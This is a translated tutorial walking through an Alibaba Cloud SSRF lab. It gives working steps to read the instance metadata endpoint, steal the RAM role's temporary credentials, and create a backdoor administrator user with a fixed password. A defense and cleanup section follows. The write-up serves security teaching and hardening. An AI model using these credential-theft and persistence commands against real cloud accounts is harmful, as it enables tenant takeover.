Title: From a Cloud Server SSRF Vulnerability to Taking Over Your Alibaba Cloud Console

0x00 Introduction

This article will use Alibaba Cloud as an example to demonstrate some offensive and defensive methods in cloud services. First, use Terraform to build an ECS SSRF vulnerability environment, and then step by step to obtain all Alibaba Cloud service permissions of the cloud service account through the SSRF vulnerability existing in the instance.

0x01 Environment construction

This article uses TerraformGoat to build the shooting range. TerraformGoat range address: https://github.com/HuoCorp/TerraformGoat(opens new window)

When deploying a shooting range, you need to use your Alibaba Cloud AccessKey. In order to avoid affecting your cloud production environment, it is highly recommended to use AccessKey in non-production environments here and do not use the same account as the production environment.

Due to the iterative update of the TerraformGoat tool, the following environment construction method has failed, and the deployment method is now more convenient and friendly. For specific deployment methods, please refer to the TerraformGoat shooting range address above.

Next, we start to build a shooting range, first clone the shooting range project to the local area, and build the dependencies needed to download the shooting range.

git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1

cd TerraformGoat

docker build . -t terraformgoat:v0.0.3

docker run -itd --name terraformgoat terraformgoat:v0.0.3

docker exec -it terraformgoat /bin/bash If github access is slow, you can hang a proxy to the terminal

proxy_url='127.0.0.1:1080' export https_proxy=http://$proxy_url http_proxy=http://$proxy_url all_proxy=socks5://$proxy_url After entering the container, the container will prompt you to select the cloud service provider you want to use next. Here, take Alibaba Cloud service as an example, enter 2 and select Alibaba Cloud and press Enter.

Enter the Alibaba Cloud ECS SSRF shooting range path and configure your AccessKey

cd /TerraformGoat/aliyun/ecs/ecs_ssrf/

aliyun configuration

Deploy SSRF Range

terraform init

terraform apply If init initialization is slow, just hang up the proxy.

During the apply period, Enter a value will be prompted, and then enter yes to enter.

At Outputs, you can see the returned range address. When you visit this address, you can see the SSRF test range page. This means that the environment has been built.

0x02 Environmental Utilization

There is an SSRF vulnerability in the current environment, but unlike the environment in which regular SSRF is located, the SSRF vulnerability here appears on the cloud server, which means that we can obtain the metadata information of the server through this SSRF vulnerability.

Access metadata

http://100.100.100.200/latest/meta-data

In the returned result, you can see that the current environment has a ram/directory, which means that the current cloud server has configured a RAM role, so that we can obtain temporary credentials.

Get temporary credentials through metadata

The huocorp-terraform-goat-role in the URL here is the RAM role name, which can be obtained by visiting http://100.100.100.200/latest/meta-data/ram/security-credentials/.

http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role

Configure temporary credentials into the aliyun command line tool.

aliyun configure --mode StsToken

Create sub-users and grant administrator permissions

aliyun ram CreateUser --UserName teamssix

aliyun ram CreateLoginProfile --UserName teamssix --Password TeamsSix@666

aliyun ram AttachPolicyToUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

Visit the https://signin.aliyun.com(opens new window) page and log in through a RAM user. The user format here is username@company-alias, where username is the username you just created. company-alias can be obtained through the following command.

aliyun ram GetAccountAlias

The AccountAlias here is the company-alias we need, and you can log in to the console next.

Enter the password when the user was created just now

After logging in, you can see the target console.

Since AdministratorAccess permission was granted when creating a user just now, you can see from the RAM access control office that the current account has permission to manage all Alibaba Cloud resources.

In the cloud service ECS instance, you can also see the SSRF shooting range server we just built.

At this point, it has been implemented to take over the Alibaba Cloud console by taking advantage of the SSRF vulnerability on the cloud server.

In addition, a flag file is also placed in this environment. If you are interested, you can try to find this flag. Writeup address: https://github.com/HuoCorp/TerraformGoat/tree/main/aliyun/ecs/ecs_ssrf(opens new window)

0x03 Defense Measures

In addition to SSRF, there are two other major problems in this environment:

The RAM role has too large permissions, which leads to the operation metadata such as creating sub-users through the permissions of the role and granting high permissions to the sub-users without any reinforcement. As a result, once the target has SSRF or the target permissions are taken down, the metadata is at risk of being acquired. For the problem of excessive permissions of the first RAM role, the main thing is that the user strictly abides by the principle of minimizing permissions. When granting permissions to the RAM role, avoid giving too high permissions and only granting the permissions they need, which can minimize the impact, but this cannot cure the root cause.

In response to the problem that the second metadata is not hardened to access, the metadata access mode on the instance can be set to hardened mode. This is a fundamental solution. There are two ways to set the metadata access mode to hardened mode:

When creating an instance, you can set "Instance Metadata Access Mode" to "Righten Only Mode" in the Advanced Options of System Configuration

In the already created instance, you can enable metadata forced access using Token in Alibaba Cloud OpenAPI. OpenAPI address: https://next.api.aliyun.com/api/Ecs/2014-05-26/ModifyInstanceMetadataOptions(opens new window)

Setting HttpTokens to required means that the hardening mode is used forcefully. At this time, accessing the metadata will prompt 403.

It is worth mentioning that setting metadata to harden mode can prevent metadata from being obtained through SSRF, but if the instance permission is taken down, the red team can still execute the command to get the token on the instance and then use the token to get the metadata.

The command to get token in a Linux instance is as follows:

TOKEN=`curl -X PUT 'http://100.100.100.200/latest/api/token' -H 'X-aliyun-ecs-metadata-token-ttl-seconds: 21600'`Get metadata through token

curl -H 'X-aliyun-ecs-metadata-token: $TOKEN' http://100.100.100.200/latest/meta-data/

For the method to obtain under Windows instances, please refer to Alibaba Cloud's official document: https://help.aliyun.com/document_detail/108460.htm(opens new window)

This method to set the metadata access mode to reinforcement mode to defend against SSRF vulnerabilities is provided by Master 2h0ng

0x04 Environment Delete

Delete the created sub-account

aliyun ram DetachPolicyFromUser --PolicyType System --PolicyName AdministratorAccess --UserName teamssix

aliyun ram DeleteUser --UserName teamssix deletes the SSRF shooting range environment. After using the shooting range, remember to delete it in time, because the cloud service created here is billed by time, and the price of this shooting range instance is RMB 0.17 per hour.

Before destroying the shooting range, remember to configure AccessKey as the initial AccessKey, and configure the command: aliyun configure --mode AK

terraform destroy If you want to clear TerraformGoat, you can use the following command. If you want to learn cloud attack and defense in the future, you can keep the TerraformGoat environment.

docker stop terraformgoat

docker rm terraformgoat

docker rmi terraformgoat:v0.0.3

0x05 Summary

Here, a temporary key was obtained through the SSRF vulnerability on the cloud. A subscriber with administrator access was created through the temporary key, and finally the target console was taken over through this subscriber.

However, there are some prerequisites for using this method in actual combat, and the main prerequisites are the following two:

The ECS instance needs to be granted a RAM role, otherwise the metadata of accessing temporary credentials will return 404RAM. The role needs to have relevant operational permissions for ram access control, such as creating users, granting permissions, etc. otherwise the temporary key will not have the permission to create sub-users. In actual combat, if an ECS instance is granted a RAM role, most of the time the role does not have the user creation permission. At this time, it is impossible to log in to the console by creating a sub-account. You can only operate the target cloud service through the Alibaba Cloud command line tool.

In general, cloud attack and defense are still very different from conventional intranet attack and defense.

A common problem with cloud attack and defense is configuration errors. For example, the problem here is that the RAM role configuration permissions are too high. The main method of maintaining permissions on cloud attack and defense is to create high-privileged RAM users, rather than having a variety of permissions on traditional attack and defense. The intranet horizontal direction of cloud attack and defense is mainly horizontally in the cloud service manufacturer's command line or console, from this cloud service to another cloud service, rather than having various intranet horizontal methods like traditional attack and defense.Finally, many of the commands mentioned in this article refer to the content in the Fireline Cloud Security Knowledge Base. The knowledge base address is: https://cloudsec.huoxian.cn(opens new window). You can see the Fireline Cloud Service Attack and Defense Matrix on the homepage of the knowledge base. This article is the cloud attack and defense based on this attack and defense matrix.

If you want to find more cloud security resources to learn, you can visit the Awesome Cloud Security project, which currently contains more than a hundred domestic and foreign cloud security blogs, tools, official accounts and other resources. The project address is: https://github.com/teamssix/awesome-cloud-security(opens new window)

Reference article: https://cloudsec.huoxian.cn/docs/articles/aliyun/aliyun_ecs

Original connection: https://wiki.teamssix.com/CloudService/EC2/aliyun-console-takeover.html